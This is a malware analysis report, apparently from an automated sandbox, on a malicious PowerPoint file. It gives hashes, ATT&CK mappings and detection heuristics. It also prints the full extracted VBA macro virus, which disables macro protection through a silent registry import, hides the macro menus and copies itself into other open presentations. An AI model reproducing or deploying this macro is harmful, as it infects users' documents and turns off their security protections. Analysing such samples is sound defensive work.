Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2375e02a9dbe8d9f…

MALICIOUS

Office (OLE)

15.0 KB Created: 1601-01-01 00:00:00 Authoring application: Microsoft PowerPoint First seen: 2012-06-14
MD5: bef265554db7d0dbf08d3b518c178905 SHA-1: 392c673d7bafb40ac780399a7b2a8836d1b491c1 SHA-256: 2375e02a9dbe8d9f405b90973445fa202419bf6b882fe4c992d453e235020387
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1553.005 Security Software Installation T1070.004 File Deletion

The sample is a malicious PowerPoint file containing VBA macros. The macro attempts to disable macro security by writing to the registry and then spreads itself to other open presentations by exporting and importing its code. It also attempts to delete the exported macro file.

Heuristics 3

  • ClamAV: Win.Trojan.PP97M-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.PP97M-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1039 bytes
SHA-256: 4e7eacbff5477f5838506bb5237cf3e77b5f7021dc25a373e29e8609fdad4a99
Detection
ClamAV: Win.Trojan.PP97M-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "LACOPHRONE"
Sub LACO()
On Error Resume Next
With ActivePresentation.VBProject.VBComponents("LACOPHRONE")
.Export ("C:\CONFIG.LAC")
End With

With CommandBars("Tools")
.Controls("Macro").Enabled = 0
.Controls("Customize...").Enabled = 0
End With
Open "c:\power.reg" For Output As 1
Print #1, "REGEDIT4"
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\PowerPoint\Options]"
Print #1, """MacroVirusProtection""=dword:00000000"
Close 1
Shell "regedit /s c:\power.reg", vbHide
For i = 1 To Presentations.Count
If Presentations(i).VBProject.VBComponents(1).Name <> "LACOPHRONE" Then
With Presentations(i).VBProject.VBComponents
.Import("C:\CONFIG.LAC").Name = "LACOPHRONE"
End With
End If
Next
For Each kilo In ActivePresentation.Slides(ActivePresentation.Slides.Count).Shapes
With kilo.ActionSettings(ppMouseOver)
.Action = ppActionRunMacro
.Run "LACOPHRONE"
End With
With kilo.ActionSettings(ppMouseClick)
.Action = ppActionRunMacro
.Run "LACOPHRONE"
End With
Next
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.